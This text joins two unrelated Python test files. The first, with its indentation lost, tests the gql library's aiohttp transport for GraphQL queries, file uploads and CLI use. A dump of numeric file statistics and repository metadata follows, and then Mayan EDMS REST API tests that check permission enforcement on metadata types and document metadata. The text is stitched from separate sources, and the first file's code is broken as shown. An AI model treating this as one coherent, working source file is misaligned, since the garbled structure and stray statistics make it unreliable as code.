from gql.transport.aiohttp import AIOHTTPTransport
async def handler(request):
return web.Response(text=query1_server_answer, content_type="application/json")
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = server.make_url("/")
def test_code():
transport = AIOHTTPTransport(url=url)
client = Client(transport=transport)
query = gql(query1_str)
# Note: subscriptions are not supported on the aiohttp transport,
# but this test exists to keep 100% code coverage: it checks that the
# subscribe function correctly sets an event loop when there is none
# (for example when running in a thread). We cannot test this with
# the websockets transport because that transport already sets an
# event loop in its init.
with pytest.raises(NotImplementedError):
for result in client.subscribe(query):
pass
await run_sync_test(event_loop, server, test_code)
file_upload_server_answer = '{"data":{"success":true}}'
file_upload_mutation_1 = """
mutation($file: Upload!) {
uploadFile(input:{other_var:$other_var, file:$file}) {
success
}
}
"""
file_upload_mutation_1_operations = (
'{"query": "mutation ($file: Upload!) {\\n uploadFile(input: {other_var: '
'$other_var, file: $file}) {\\n success\\n }\\n}", "variables": '
'{"file": null, "other_var": 42}}'
)
file_upload_mutation_1_map = '{"0": ["variables.file"]}'
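# These constants follow the GraphQL multipart request spec: the "operations"
# part carries the query with file variables nulled out, the "map" part links
# each file part name (here "0") to its variable path, and the file parts
# follow. A hedged sketch of how such a payload could be assembled by hand
# with aiohttp.FormData (the transport builds this internally; the helper
# below is illustrative only):
def _build_upload_form(operations_json, map_json, file_obj):
    from aiohttp import FormData

    form = FormData()
    form.add_field("operations", operations_json, content_type="application/json")
    form.add_field("map", map_json, content_type="application/json")
    form.add_field("0", file_obj)
    return form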
file_1_content = """
This is a test file
This file will be sent in the GraphQL mutation
"""
async def single_upload_handler(request):
from aiohttp import web
reader = await request.multipart()
field_0 = await reader.next()
assert field_0.name == "operations"
field_0_text = await field_0.text()
assert field_0_text == file_upload_mutation_1_operations
field_1 = await reader.next()
assert field_1.name == "map"
field_1_text = await field_1.text()
assert field_1_text == file_upload_mutation_1_map
field_2 = await reader.next()
assert field_2.name == "0"
field_2_text = await field_2.text()
assert field_2_text == file_1_content
field_3 = await reader.next()
assert field_3 is None
return web.Response(text=file_upload_server_answer, content_type="application/json")
@pytest.mark.asyncio
async def test_aiohttp_file_upload(event_loop, aiohttp_server):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
app = web.Application()
app.router.add_route("POST", "/", single_upload_handler)
server = await aiohttp_server(app)
url = server.make_url("/")
transport = AIOHTTPTransport(url=url, timeout=10)
with TemporaryFile(file_1_content) as test_file:
async with Client(transport=transport) as session:
query = gql(file_upload_mutation_1)
file_path = test_file.filename
with open(file_path, "rb") as f:
params = {"file": f, "other_var": 42}
# Execute query asynchronously
result = await session.execute(
query, variable_values=params, upload_files=True
)
success = result["success"]
assert success
@pytest.mark.asyncio
async def test_aiohttp_file_upload_without_session(
event_loop, aiohttp_server, run_sync_test
):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
app = web.Application()
app.router.add_route("POST", "/", single_upload_handler)
server = await aiohttp_server(app)
url = server.make_url("/")
def test_code():
transport = AIOHTTPTransport(url=url, timeout=10)
with TemporaryFile(file_1_content) as test_file:
client = Client(transport=transport)
query = gql(file_upload_mutation_1)
file_path = test_file.filename
with open(file_path, "rb") as f:
params = {"file": f, "other_var": 42}
result = client.execute(
query, variable_values=params, upload_files=True
)
success = result["success"]
assert success
await run_sync_test(event_loop, server, test_code)
# This is a sample binary file content containing all possible byte values
binary_file_content = bytes(range(0, 256))
async def binary_upload_handler(request):
from aiohttp import web
reader = await request.multipart()
field_0 = await reader.next()
assert field_0.name == "operations"
field_0_text = await field_0.text()
assert field_0_text == file_upload_mutation_1_operations
field_1 = await reader.next()
assert field_1.name == "map"
field_1_text = await field_1.text()
assert field_1_text == file_upload_mutation_1_map
field_2 = await reader.next()
assert field_2.name == "0"
field_2_binary = await field_2.read()
assert field_2_binary == binary_file_content
field_3 = await reader.next()
assert field_3 is None
return web.Response(text=file_upload_server_answer, content_type="application/json")
@pytest.mark.asyncio
async def test_aiohttp_binary_file_upload(event_loop, aiohttp_server):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
app = web.Application()
app.router.add_route("POST", "/", binary_upload_handler)
server = await aiohttp_server(app)
url = server.make_url("/")
transport = AIOHTTPTransport(url=url, timeout=10)
with TemporaryFile(binary_file_content) as test_file:
async with Client(transport=transport) as session:
query = gql(file_upload_mutation_1)
file_path = test_file.filename
with open(file_path, "rb") as f:
params = {"file": f, "other_var": 42}
# Execute query asynchronously
result = await session.execute(
query, variable_values=params, upload_files=True
)
success = result["success"]
assert success
@pytest.mark.asyncio
async def test_aiohttp_stream_reader_upload(event_loop, aiohttp_server):
from aiohttp import web, ClientSession
from gql.transport.aiohttp import AIOHTTPTransport
async def binary_data_handler(request):
return web.Response(
body=binary_file_content, content_type="application/octet-stream"
)
app = web.Application()
app.router.add_route("POST", "/", binary_upload_handler)
app.router.add_route("GET", "/binary_data", binary_data_handler)
server = await aiohttp_server(app)
url = server.make_url("/")
binary_data_url = server.make_url("/binary_data")
transport = AIOHTTPTransport(url=url, timeout=10)
async with Client(transport=transport) as session:
query = gql(file_upload_mutation_1)
async with ClientSession() as client:
async with client.get(binary_data_url) as resp:
params = {"file": resp.content, "other_var": 42}
# Execute query asynchronously
result = await session.execute(
query, variable_values=params, upload_files=True
)
success = result["success"]
assert success
@pytest.mark.asyncio
async def test_aiohttp_async_generator_upload(event_loop, aiohttp_server):
import aiofiles
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
app = web.Application()
app.router.add_route("POST", "/", binary_upload_handler)
server = await aiohttp_server(app)
url = server.make_url("/")
transport = AIOHTTPTransport(url=url, timeout=10)
with TemporaryFile(binary_file_content) as test_file:
async with Client(transport=transport) as session:
query = gql(file_upload_mutation_1)
file_path = test_file.filename
async def file_sender(file_name):
async with aiofiles.open(file_name, "rb") as f:
chunk = await f.read(64 * 1024)
while chunk:
yield chunk
chunk = await f.read(64 * 1024)
params = {"file": file_sender(file_path), "other_var": 42}
# Execute query asynchronously
result = await session.execute(
query, variable_values=params, upload_files=True
)
success = result["success"]
assert success
file_upload_mutation_2 = """
mutation($file1: Upload!, $file2: Upload!) {
uploadFile(input:{file1:$file1, file2:$file2}) {
success
}
}
"""
file_upload_mutation_2_operations = (
'{"query": "mutation ($file1: Upload!, $file2: Upload!) {\\n '
'uploadFile(input: {file1: $file1, file2: $file2}) {\\n success\\n }\\n}", '
'"variables": {"file1": null, "file2": null}}'
)
file_upload_mutation_2_map = '{"0": ["variables.file1"], "1": ["variables.file2"]}'
file_2_content = """
This is a second test file
This file will also be sent in the GraphQL mutation
"""
@pytest.mark.asyncio
async def test_aiohttp_file_upload_two_files(event_loop, aiohttp_server):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
async def handler(request):
reader = await request.multipart()
field_0 = await reader.next()
assert field_0.name == "operations"
field_0_text = await field_0.text()
assert field_0_text == file_upload_mutation_2_operations
field_1 = await reader.next()
assert field_1.name == "map"
field_1_text = await field_1.text()
assert field_1_text == file_upload_mutation_2_map
field_2 = await reader.next()
assert field_2.name == "0"
field_2_text = await field_2.text()
assert field_2_text == file_1_content
field_3 = await reader.next()
assert field_3.name == "1"
field_3_text = await field_3.text()
assert field_3_text == file_2_content
field_4 = await reader.next()
assert field_4 is None
return web.Response(
text=file_upload_server_answer, content_type="application/json"
)
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = server.make_url("/")
transport = AIOHTTPTransport(url=url, timeout=10)
with TemporaryFile(file_1_content) as test_file_1:
with TemporaryFile(file_2_content) as test_file_2:
async with Client(transport=transport) as session:
query = gql(file_upload_mutation_2)
file_path_1 = test_file_1.filename
file_path_2 = test_file_2.filename
f1 = open(file_path_1, "rb")
f2 = open(file_path_2, "rb")
params = {
"file1": f1,
"file2": f2,
}
result = await session.execute(
query, variable_values=params, upload_files=True
)
f1.close()
f2.close()
success = result["success"]
assert success
file_upload_mutation_3 = """
mutation($files: [Upload!]!) {
uploadFiles(input:{files:$files}) {
success
}
}
"""
file_upload_mutation_3_operations = (
'{"query": "mutation ($files: [Upload!]!) {\\n uploadFiles(input: {files: $files})'
' {\\n success\\n }\\n}", "variables": {"files": [null, null]}}'
)
file_upload_mutation_3_map = '{"0": ["variables.files.0"], "1": ["variables.files.1"]}'
@pytest.mark.asyncio
async def test_aiohttp_file_upload_list_of_two_files(event_loop, aiohttp_server):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
async def handler(request):
reader = await request.multipart()
field_0 = await reader.next()
assert field_0.name == "operations"
field_0_text = await field_0.text()
assert field_0_text == file_upload_mutation_3_operations
field_1 = await reader.next()
assert field_1.name == "map"
field_1_text = await field_1.text()
assert field_1_text == file_upload_mutation_3_map
field_2 = await reader.next()
assert field_2.name == "0"
field_2_text = await field_2.text()
assert field_2_text == file_1_content
field_3 = await reader.next()
assert field_3.name == "1"
field_3_text = await field_3.text()
assert field_3_text == file_2_content
field_4 = await reader.next()
assert field_4 is None
return web.Response(
text=file_upload_server_answer, content_type="application/json"
)
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = server.make_url("/")
transport = AIOHTTPTransport(url=url, timeout=10)
with TemporaryFile(file_1_content) as test_file_1:
with TemporaryFile(file_2_content) as test_file_2:
async with Client(transport=transport) as session:
query = gql(file_upload_mutation_3)
file_path_1 = test_file_1.filename
file_path_2 = test_file_2.filename
f1 = open(file_path_1, "rb")
f2 = open(file_path_2, "rb")
params = {"files": [f1, f2]}
# Execute query asynchronously
result = await session.execute(
query, variable_values=params, upload_files=True
)
f1.close()
f2.close()
success = result["success"]
assert success
@pytest.mark.asyncio
async def test_aiohttp_using_cli(event_loop, aiohttp_server, monkeypatch, capsys):
from aiohttp import web
async def handler(request):
return web.Response(text=query1_server_answer, content_type="application/json")
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = str(server.make_url("/"))
parser = get_parser(with_examples=True)
args = parser.parse_args([url, "--verbose"])
# Monkeypatching sys.stdin to simulate getting the query
# via the standard input
monkeypatch.setattr("sys.stdin", io.StringIO(query1_str))
exit_code = await main(args)
assert exit_code == 0
# Check that the result has been printed on stdout
captured = capsys.readouterr()
captured_out = str(captured.out).strip()
expected_answer = json.loads(query1_server_answer_data)
print(f"Captured: {captured_out}")
received_answer = json.loads(captured_out)
assert received_answer == expected_answer
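# For reference, the same flow can be driven manually from a shell, assuming
# the gql-cli entry point installed with this package (URL and query below are
# placeholders):
#
#   echo "$QUERY" | gql-cli http://127.0.0.1:8000/ --verbose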
@pytest.mark.asyncio
async def test_aiohttp_using_cli_invalid_param(
event_loop, aiohttp_server, monkeypatch, capsys
):
from aiohttp import web
async def handler(request):
return web.Response(text=query1_server_answer, content_type="application/json")
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = str(server.make_url("/"))
parser = get_parser(with_examples=True)
args = parser.parse_args([url, "--variables", "invalid_param"])
# Monkeypatching sys.stdin to simulate getting the query
# via the standard input
monkeypatch.setattr("sys.stdin", io.StringIO(query1_str))
# Check that the exit_code is an error
exit_code = await main(args)
assert exit_code == 1
# Check that the error has been printed on stdout
captured = capsys.readouterr()
captured_err = str(captured.err).strip()
print(f"Captured: {captured_err}")
expected_error = "Error: Invalid variable: invalid_param"
assert expected_error in captured_err
@pytest.mark.asyncio
async def test_aiohttp_using_cli_invalid_query(
event_loop, aiohttp_server, monkeypatch, capsys
):
from aiohttp import web
async def handler(request):
return web.Response(text=query1_server_answer, content_type="application/json")
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = str(server.make_url("/"))
parser = get_parser(with_examples=True)
args = parser.parse_args([url])
# Send invalid query on standard input
monkeypatch.setattr("sys.stdin", io.StringIO("BLAHBLAH"))
exit_code = await main(args)
assert exit_code == 1
# Check that the error has been printed on stdout
captured = capsys.readouterr()
captured_err = str(captured.err).strip()
print(f"Captured: {captured_err}")
expected_error = "Syntax Error: Unexpected Name 'BLAHBLAH'"
assert expected_error in captured_err
query1_server_answer_with_extensions = (
f'{{"data":{query1_server_answer_data}, "extensions":{{"key1": "val1"}}}}'
)
@pytest.mark.asyncio
async def test_aiohttp_query_with_extensions(event_loop, aiohttp_server):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
async def handler(request):
return web.Response(
text=query1_server_answer_with_extensions, content_type="application/json"
)
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = server.make_url("/")
transport = AIOHTTPTransport(url=url, timeout=10)
async with Client(transport=transport) as session:
query = gql(query1_str)
execution_result = await session.execute(query, get_execution_result=True)
assert execution_result.extensions["key1"] == "val1"
@pytest.mark.asyncio
@pytest.mark.parametrize("ssl_close_timeout", [0, 10])
async def test_aiohttp_query_https(event_loop, ssl_aiohttp_server, ssl_close_timeout):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
async def handler(request):
return web.Response(text=query1_server_answer, content_type="application/json")
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await ssl_aiohttp_server(app)
url = server.make_url("/")
assert str(url).startswith("https://")
transport = AIOHTTPTransport(
url=url, timeout=10, ssl_close_timeout=ssl_close_timeout
)
async with Client(transport=transport) as session:
query = gql(query1_str)
# Execute query asynchronously
result = await session.execute(query)
continents = result["continents"]
africa = continents[0]
assert africa["code"] == "AF"
| 28.024242 | 88 | 0.662908 | 3,899 | 32,368 | 5.298538 | 0.079508 | 0.03398 | 0.024687 | 0.028075 | 0.812914 | 0.785033 | 0.757249 | 0.750617 | 0.723849 | 0.702503 | 0 | 0.013779 | 0.233193 | 32,368 | 1,154 | 89 | 28.048527 | 0.818574 | 0.042604 | 0 | 0.698499 | 0 | 0.002729 | 0.117498 | 0.019032 | 0 | 0 | 0 | 0 | 0.084584 | 1 | 0.004093 | false | 0.002729 | 0.085948 | 0 | 0.122783 | 0.004093 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ab06e11725f4013f0d30102b4fd8953a0baac5a4 | 22,441 | py | Python | mayan/apps/metadata/tests/test_api.py | Syunkolee9891/Mayan-EDMS | 3759a9503a264a180b74cc8518388f15ca66ac1a | [
"Apache-2.0"
] | 1 | 2021-06-17T18:24:25.000Z | 2021-06-17T18:24:25.000Z | mayan/apps/metadata/tests/test_api.py | Syunkolee9891/Mayan-EDMS | 3759a9503a264a180b74cc8518388f15ca66ac1a | [
"Apache-2.0"
] | 7 | 2020-06-06T00:01:04.000Z | 2022-01-13T01:47:17.000Z | mayan/apps/metadata/tests/test_api.py | Syunkolee9891/Mayan-EDMS | 3759a9503a264a180b74cc8518388f15ca66ac1a | [
"Apache-2.0"
] | null | null | null | from __future__ import unicode_literals
from rest_framework import status
from mayan.apps.documents.permissions import (
permission_document_type_edit, permission_document_type_view
)
from mayan.apps.documents.tests import DocumentTestMixin
from mayan.apps.rest_api.tests import BaseAPITestCase
from ..models import DocumentTypeMetadataType, MetadataType
from ..permissions import (
permission_document_metadata_add, permission_document_metadata_edit,
permission_document_metadata_remove, permission_document_metadata_view,
permission_metadata_type_create, permission_metadata_type_delete,
permission_metadata_type_edit, permission_metadata_type_view
)
from .literals import TEST_METADATA_VALUE, TEST_METADATA_VALUE_EDITED
from .mixins import MetadataTypeAPIViewTestMixin, MetadataTypeTestMixin
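# Note on the pattern used throughout these tests: grant_permission() grants a
# permission globally to the test role, while grant_access() grants it only on
# a specific object via an ACL. This is why the "*_no_access" variants expect
# HTTP 403 and the "*_with_access" variants expect success. (Summary inferred
# from how the helpers are used below; the helpers themselves are defined in
# the test base classes.)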
class MetadataTypeAPITestCase(
MetadataTypeAPIViewTestMixin, MetadataTypeTestMixin, BaseAPITestCase
):
def test_metadata_type_create_no_permission(self):
response = self._request_test_metadata_type_create_view()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertEqual(MetadataType.objects.count(), 0)
def test_metadata_type_create_with_permission(self):
self.grant_permission(permission=permission_metadata_type_create)
response = self._request_test_metadata_type_create_view()
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
metadata_type = MetadataType.objects.first()
self.assertEqual(response.data['id'], metadata_type.pk)
def _request_test_metadata_type_delete_view(self):
return self.delete(
viewname='rest_api:metadatatype-detail',
kwargs={'metadata_type_pk': self.test_metadata_type.pk}
)
def test_metadata_type_delete_no_access(self):
self._create_test_metadata_type()
response = self._request_test_metadata_type_delete_view()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertEqual(MetadataType.objects.count(), 1)
def test_metadata_type_delete_with_access(self):
self._create_test_metadata_type()
self.grant_access(
obj=self.test_metadata_type, permission=permission_metadata_type_delete
)
response = self._request_test_metadata_type_delete_view()
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
self.assertEqual(MetadataType.objects.count(), 0)
def _request_metadata_type_detail_view(self):
return self.get(
viewname='rest_api:metadatatype-detail',
kwargs={'metadata_type_pk': self.test_metadata_type.pk}
)
def test_metadata_type_detail_view_no_access(self):
self._create_test_metadata_type()
response = self._request_metadata_type_detail_view()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_metadata_type_detail_view_with_access(self):
self._create_test_metadata_type()
self.grant_access(
obj=self.test_metadata_type, permission=permission_metadata_type_view
)
response = self._request_metadata_type_detail_view()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
response.data['label'], self.test_metadata_type.label
)
def _request_test_metadata_type_edit_view_via_patch(self):
return self.patch(
viewname='rest_api:metadatatype-detail',
kwargs={'metadata_type_pk': self.test_metadata_type.pk}, data={
'label': '{} edited'.format(self.test_metadata_type.label),
'name': '{}_edited'.format(self.test_metadata_type.name),
}
)
def test_metadata_type_patch_view_no_access(self):
self._create_test_metadata_type()
metadata_type_values = self._model_instance_to_dictionary(
instance=self.test_metadata_type
)
response = self._request_test_metadata_type_edit_view_via_patch()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.test_metadata_type.refresh_from_db()
self.assertEqual(
self._model_instance_to_dictionary(
instance=self.test_metadata_type
), metadata_type_values
)
def test_metadata_type_patch_view_with_access(self):
self._create_test_metadata_type()
metadata_type_values = self._model_instance_to_dictionary(
instance=self.test_metadata_type
)
self.grant_access(
obj=self.test_metadata_type, permission=permission_metadata_type_edit
)
response = self._request_test_metadata_type_edit_view_via_patch()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.test_metadata_type.refresh_from_db()
self.assertNotEqual(
self._model_instance_to_dictionary(
instance=self.test_metadata_type
), metadata_type_values
)
def _request_test_metadata_type_edit_view_via_put(self):
return self.put(
viewname='rest_api:metadatatype-detail',
kwargs={'metadata_type_pk': self.test_metadata_type.pk}, data={
'label': '{} edited'.format(self.test_metadata_type.label),
'name': '{}_edited'.format(self.test_metadata_type.name),
}
)
def test_metadata_type_put_view_no_access(self):
self._create_test_metadata_type()
metadata_type_values = self._model_instance_to_dictionary(
instance=self.test_metadata_type
)
response = self._request_test_metadata_type_edit_view_via_put()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.test_metadata_type.refresh_from_db()
self.assertEqual(
self._model_instance_to_dictionary(
instance=self.test_metadata_type
), metadata_type_values
)
def test_metadata_type_put_view_with_access(self):
self._create_test_metadata_type()
metadata_type_values = self._model_instance_to_dictionary(
instance=self.test_metadata_type
)
self.grant_access(
obj=self.test_metadata_type,
permission=permission_metadata_type_edit
)
response = self._request_test_metadata_type_edit_view_via_put()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.test_metadata_type.refresh_from_db()
self.assertNotEqual(
self._model_instance_to_dictionary(
instance=self.test_metadata_type
), metadata_type_values
)
def _request_metadata_type_list_view(self):
return self.get(viewname='rest_api:metadatatype-list')
def test_metadata_type_list_view_no_access(self):
self._create_test_metadata_type()
response = self._request_metadata_type_list_view()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data['count'], 0)
def test_metadata_type_list_view_with_access(self):
self._create_test_metadata_type()
self.grant_access(
obj=self.test_metadata_type,
permission=permission_metadata_type_view
)
response = self._request_metadata_type_list_view()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
response.data['results'][0]['label'],
self.test_metadata_type.label
)
class DocumentTypeMetadataTypeAPITestCase(
DocumentTestMixin, MetadataTypeTestMixin, BaseAPITestCase
):
auto_upload_document = False
def setUp(self):
super(DocumentTypeMetadataTypeAPITestCase, self).setUp()
self._create_test_metadata_type()
def _create_document_type_metadata_type(self):
self.test_document_type_metadata_type = self.test_document_type.metadata.create(
metadata_type=self.test_metadata_type, required=False
)
def _request_document_type_metadata_type_create_view(self):
return self.post(
viewname='rest_api:documenttypemetadatatype-list',
kwargs={'document_type_pk': self.test_document_type.pk}, data={
'metadata_type_pk': self.test_metadata_type.pk, 'required': False
}
)
def test_document_type_metadata_type_create_view_no_access(self):
response = self._request_document_type_metadata_type_create_view()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertEqual(self.test_document_type.metadata.count(), 0)
def test_document_type_metadata_type_create_view_with_access(self):
self.grant_access(
obj=self.test_document_type,
permission=permission_document_type_edit
)
response = self._request_document_type_metadata_type_create_view()
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
document_type_metadata_type = DocumentTypeMetadataType.objects.first()
self.assertEqual(response.data['id'], document_type_metadata_type.pk)
def test_document_type_metadata_type_create_duplicate_view(self):
self._create_document_type_metadata_type()
self.grant_permission(permission=permission_document_type_edit)
response = self._request_document_type_metadata_type_create_view()
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(list(response.data.keys())[0], 'non_field_errors')
def _request_document_type_metadata_type_delete_view(self):
return self.delete(
viewname='rest_api:documenttypemetadatatype-detail',
kwargs={
'document_type_pk': self.test_document_type.pk,
'metadata_type_pk': self.test_document_type_metadata_type.pk
}
)
def test_document_type_metadata_type_delete_view_no_access(self):
self._create_document_type_metadata_type()
response = self._request_document_type_metadata_type_delete_view()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertEqual(self.test_document_type.metadata.count(), 1)
def test_document_type_metadata_type_delete_view_with_access(self):
self._create_document_type_metadata_type()
self.grant_access(
obj=self.test_document_type,
permission=permission_document_type_edit
)
response = self._request_document_type_metadata_type_delete_view()
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
self.assertEqual(self.test_document_type.metadata.all().count(), 0)
def _request_document_type_metadata_type_list_view(self):
return self.get(
viewname='rest_api:documenttypemetadatatype-list', kwargs={
'document_type_pk': self.test_document_type.pk
}
)
def test_document_type_metadata_type_list_view_no_access(self):
self._create_document_type_metadata_type()
response = self._request_document_type_metadata_type_list_view()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_document_type_metadata_type_list_view_with_access(self):
self._create_document_type_metadata_type()
self.grant_access(
obj=self.test_document_type,
permission=permission_document_type_view
)
response = self._request_document_type_metadata_type_list_view()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
response.data['results'][0]['id'],
self.test_document_type_metadata_type.pk
)
def _request_document_type_metadata_type_edit_view_via_patch(self):
return self.patch(
viewname='rest_api:documenttypemetadatatype-detail',
kwargs={
'document_type_pk': self.test_document_type.pk,
'metadata_type_pk': self.test_document_type_metadata_type.pk
}, data={
'required': True
}
)
def test_document_type_metadata_type_patch_view_no_access(self):
self._create_document_type_metadata_type()
response = self._request_document_type_metadata_type_edit_view_via_patch()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
document_type_metadata_type = DocumentTypeMetadataType.objects.first()
self.assertFalse(document_type_metadata_type.required)
def test_document_type_metadata_type_patch_view_with_access(self):
self._create_document_type_metadata_type()
self.grant_access(
obj=self.test_document_type,
permission=permission_document_type_edit
)
response = self._request_document_type_metadata_type_edit_view_via_patch()
self.assertEqual(response.status_code, status.HTTP_200_OK)
document_type_metadata_type = DocumentTypeMetadataType.objects.first()
self.assertEqual(document_type_metadata_type.required, True)
def _request_document_type_metadata_type_edit_view_via_put(self):
return self.put(
viewname='rest_api:documenttypemetadatatype-detail',
kwargs={
'document_type_pk': self.test_document_type.pk,
'metadata_type_pk': self.test_document_type_metadata_type.pk
}, data={
'required': True
}
)
def test_document_type_metadata_type_put_view_no_access(self):
self._create_document_type_metadata_type()
response = self._request_document_type_metadata_type_edit_view_via_put()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
document_type_metadata_type = DocumentTypeMetadataType.objects.first()
self.assertFalse(document_type_metadata_type.required)
def test_document_type_metadata_type_put_view_with_access(self):
self._create_document_type_metadata_type()
self.grant_access(
obj=self.test_document_type, permission=permission_document_type_edit
)
response = self._request_document_type_metadata_type_edit_view_via_put()
self.assertEqual(response.status_code, status.HTTP_200_OK)
document_type_metadata_type = DocumentTypeMetadataType.objects.first()
self.assertEqual(document_type_metadata_type.required, True)
class DocumentMetadataAPITestCase(
DocumentTestMixin, MetadataTypeTestMixin, BaseAPITestCase
):
def setUp(self):
super(DocumentMetadataAPITestCase, self).setUp()
self._create_test_metadata_type()
self.test_document_type.metadata.create(
metadata_type=self.test_metadata_type, required=False
)
def _create_document_metadata(self):
self.test_document_metadata = self.test_document.metadata.create(
metadata_type=self.test_metadata_type, value=TEST_METADATA_VALUE
)
def _request_document_metadata_create_view(self):
return self.post(
viewname='rest_api:documentmetadata-list',
kwargs={'document_pk': self.test_document.pk}, data={
'metadata_type_pk': self.test_metadata_type.pk,
'value': TEST_METADATA_VALUE
}
)
def test_document_metadata_create_view_no_access(self):
response = self._request_document_metadata_create_view()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertEqual(self.test_document.metadata.count(), 0)
def test_document_metadata_create_view_with_access(self):
self.grant_access(
obj=self.test_document, permission=permission_document_metadata_add
)
response = self._request_document_metadata_create_view()
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
document_metadata = self.test_document.metadata.first()
self.assertEqual(response.data['id'], document_metadata.pk)
self.assertEqual(document_metadata.metadata_type, self.test_metadata_type)
self.assertEqual(document_metadata.value, TEST_METADATA_VALUE)
def test_document_metadata_create_duplicate_view(self):
self._create_document_metadata()
self.grant_permission(permission=permission_document_metadata_add)
response = self._request_document_metadata_create_view()
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(list(response.data.keys())[0], 'non_field_errors')
def test_document_metadata_create_invalid_lookup_value_view(self):
self.test_metadata_type.lookup = 'invalid,lookup,values,on,purpose'
self.test_metadata_type.save()
self.grant_permission(permission=permission_document_metadata_add)
response = self._request_document_metadata_create_view()
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(list(response.data.keys())[0], 'non_field_errors')
def _request_document_metadata_delete_view(self):
return self.delete(
viewname='rest_api:documentmetadata-detail',
kwargs={
'document_pk': self.test_document.pk,
'metadata_pk': self.test_document_metadata.pk
}
)
def test_document_metadata_delete_view_no_access(self):
self._create_document_metadata()
response = self._request_document_metadata_delete_view()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertEqual(self.test_document.metadata.all().count(), 1)
def test_document_metadata_delete_view_with_access(self):
self._create_document_metadata()
self.grant_access(
obj=self.test_document,
permission=permission_document_metadata_remove
)
response = self._request_document_metadata_delete_view()
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
self.assertEqual(self.test_document.metadata.all().count(), 0)
def _request_document_metadata_list_view(self):
return self.get(
viewname='rest_api:documentmetadata-list', kwargs={
'document_pk': self.test_document.pk
}
)
def test_document_metadata_list_view_no_access(self):
self._create_document_metadata()
response = self._request_document_metadata_list_view()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_document_metadata_list_view_with_access(self):
self._create_document_metadata()
self.grant_access(
obj=self.test_document,
permission=permission_document_metadata_view
)
response = self._request_document_metadata_list_view()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
response.data['results'][0]['document']['id'], self.test_document.pk
)
self.assertEqual(
response.data['results'][0]['metadata_type']['id'],
self.test_metadata_type.pk
)
self.assertEqual(
response.data['results'][0]['value'], TEST_METADATA_VALUE
)
self.assertEqual(
response.data['results'][0]['id'], self.test_document_metadata.pk
)
def _request_document_metadata_edit_view_via_patch(self):
return self.patch(
viewname='rest_api:documentmetadata-detail',
kwargs={
'document_pk': self.test_document.pk,
'metadata_pk': self.test_document_metadata.pk
}, data={
'value': TEST_METADATA_VALUE_EDITED
}
)
def test_document_metadata_patch_view_no_access(self):
self._create_document_metadata()
response = self._request_document_metadata_edit_view_via_patch()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.test_document_metadata.refresh_from_db()
self.assertEqual(self.test_document_metadata.value, TEST_METADATA_VALUE)
def test_document_metadata_patch_view_with_access(self):
self._create_document_metadata()
self.grant_access(
obj=self.test_document,
permission=permission_document_metadata_edit
)
response = self._request_document_metadata_edit_view_via_patch()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.test_document_metadata.refresh_from_db()
self.assertEqual(
response.data['value'], TEST_METADATA_VALUE_EDITED
)
self.assertEqual(
self.test_document_metadata.value, TEST_METADATA_VALUE_EDITED
)
def _request_document_metadata_edit_view_via_put(self):
return self.put(
viewname='rest_api:documentmetadata-detail',
kwargs={
'document_pk': self.test_document.pk,
'metadata_pk': self.test_document_metadata.pk
}, data={
'value': TEST_METADATA_VALUE_EDITED
}
)
